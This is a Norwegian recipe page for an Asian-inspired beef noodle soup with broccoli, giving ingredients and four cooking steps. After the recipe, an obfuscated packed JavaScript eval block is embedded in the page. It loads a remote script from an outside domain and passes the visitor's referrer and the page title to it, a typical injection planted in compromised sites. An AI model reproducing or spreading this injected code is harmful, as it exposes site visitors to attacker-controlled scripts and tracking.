Asiatisk nudelsuppe suppe med kjøtt og broccoli

kinesisk-biffsuppe

Superenkel asiainspirert nudelsuppe med kjøtt og broccoli. Kjøttet trenger dog noe koketid, to små timer faktisk, men med smart planlegging så er det ingen sak, selv i en hektisk hverdag. Det er sant:) Følg oppskriften nedenfor og du får en fantastisk middagsopplevelse.

krydre2

m

Ingredienser

ca 1 kg suppekjøtt med bein

1 broccoli

100 gr sjampinjong

150 gr nudler

1 tomat

4 fedd hvitløk

1 tommel fersk ingefær

4 anisstjerner

2 l kyllingkraft

1/2 dl soyasaus

gryte-med-anis-og-tomat

1. Legg kjøttet i en gryte, fyll på med kaldt vann, kok opp. Slå av vannet, flytt over kjøttet på en tallerkene og vask ut av gryten. Legg så kjøttet tilbake i gryten og fyll på med tomat, ingefær, anisstjerner og hvitløk. Hell over kyllingkraften.

2. Fjern innmaten på tomaten og del den i fire, skjær ingefær i tynne skiver og knus hvitløken.

3. Kok suppen i min to timer, sjekk at kjøttet er mørt. La suppen kjøle ned uten lokk. Legg kjøttet over på en tallerken og sil kraften i et klede. Vask ut av kjelen nok en gang og leg kjøttet tilbake, hell over kraften, kok opp.

pasta1

4. Del broccoli i tynne biter, skjær soppen i passe tynne skiver. Legg alt over i gryten med kjøtt og kraft og la det hele småkoke i ca 5-10 minutter.

kinesisk-biffsuppe

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))

Write a comment

Your email address will not be published. Required fields are marked *